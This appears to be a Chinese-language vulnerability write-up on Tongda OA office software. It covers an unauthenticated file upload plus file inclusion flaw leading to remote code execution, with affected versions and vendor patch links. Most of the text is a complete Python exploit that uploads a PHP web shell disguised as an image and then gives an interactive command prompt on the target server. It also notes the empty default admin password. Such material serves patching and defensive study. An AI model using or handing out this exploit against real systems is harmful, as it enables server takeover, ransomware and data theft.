漏洞說明
通達OA是一套辦公系統.近日通達OA官方在其官方論壇披露了近期一起通達OA用戶服務器遭受勒索病毒攻擊事件併發布了多個版本的漏洞補丁.漏洞類型爲任意文件上傳,受影響的版本存在文件包含漏洞. 未授權的遠程攻擊者可以通過精心構造的請求包進行文件包含並觸發遠程代碼執行.
OA通達簡介
通達OA是由北京通達信科科技有限公司研發的一款通用型OA產品,涵蓋了個人事務、行政辦公、流程審批、知識管理、人力資源管理、組織機構管理等企業信息化管理功能。2015年,通達雲OA入駐阿里雲企業應用專區,已爲衆多中小企業提供了穩定、可靠、強悍的雲計算支撐。
影響版本
tongdaOA V11
tangdaOA 2017
tangdaOA 2016
tangdaOA 2015
tangdaOA 2013 增強版
tangdaOA 2013
修復
版本 更新包下載地址
V11版 http://cdndown.tongda2000.com/oa/security/2020_A1.11.3.exe
2017版 http://cdndown.tongda2000.com/oa/security/2020_A1.10.19.exe
2016版 http://cdndown.tongda2000.com/oa/security/2020_A1.9.13.exe
2015版 http://cdndown.tongda2000.com/oa/security/2020_A1.8.15.exe
2013增強版 http://cdndown.tongda2000.com/oa/security/2020_A1.7.25.exe
2013版 http://cdndown.tongda2000.com/oa/security/2020_A1.6.20.exe
漏洞復現
通過官網下載OA軟裝.
在window下執行TDOA11.3默認提示安裝
默認用戶admin,密碼爲空
上傳文件
文件包含
腳本
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# oa通達文件上傳加文件包含遠程代碼執行
import requests
import re
import sys
def oa(url):
upurl = url + '/ispirit/im/upload.php'
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668"}
data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['cmd'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"
req = requests.post(url=upurl, headers=headers, data=data)
filename = "".join(re.findall("2003_(.+?)\|",req.text))
in_url = url + '/ispirit/interface/gateway.php'
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
data = "json={\"url\":\"../../../general/../attach/im/2003/%s.jpg\"}&cmd=%s" % (filename,"echo php00py")
include_req = requests.post(url=in_url, headers=headers, data=data)
if 'php00py' in include_req.text:
print("[+] OA RCE vulnerability ")
return filename
else:
print("[-] Not OA RCE vulnerability ")
return False
def oa_rce(url, filename,command):
url = url + '/ispirit/interface/gateway.php'
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
data = "json={\"url\":\"../../../general/../attach/im/2003/%s.jpg\"}&cmd=%s" % (filename,command)
req = requests.post(url, headers=headers, data=data)
print(req.text)
if __name__ == '__main__':
if len(sys.argv) < 2:
print("please input your url python oa_rce.py http://127.0.0.1:8181")
else:
url = sys.argv[1]
filename = oa(url)
while filename:
try:
command = input("wran@shelLhost#")
if command == "exit" or command == "quit":
break
else:
oa_rce(url,filename,command)
except KeyboardInterrupt:
break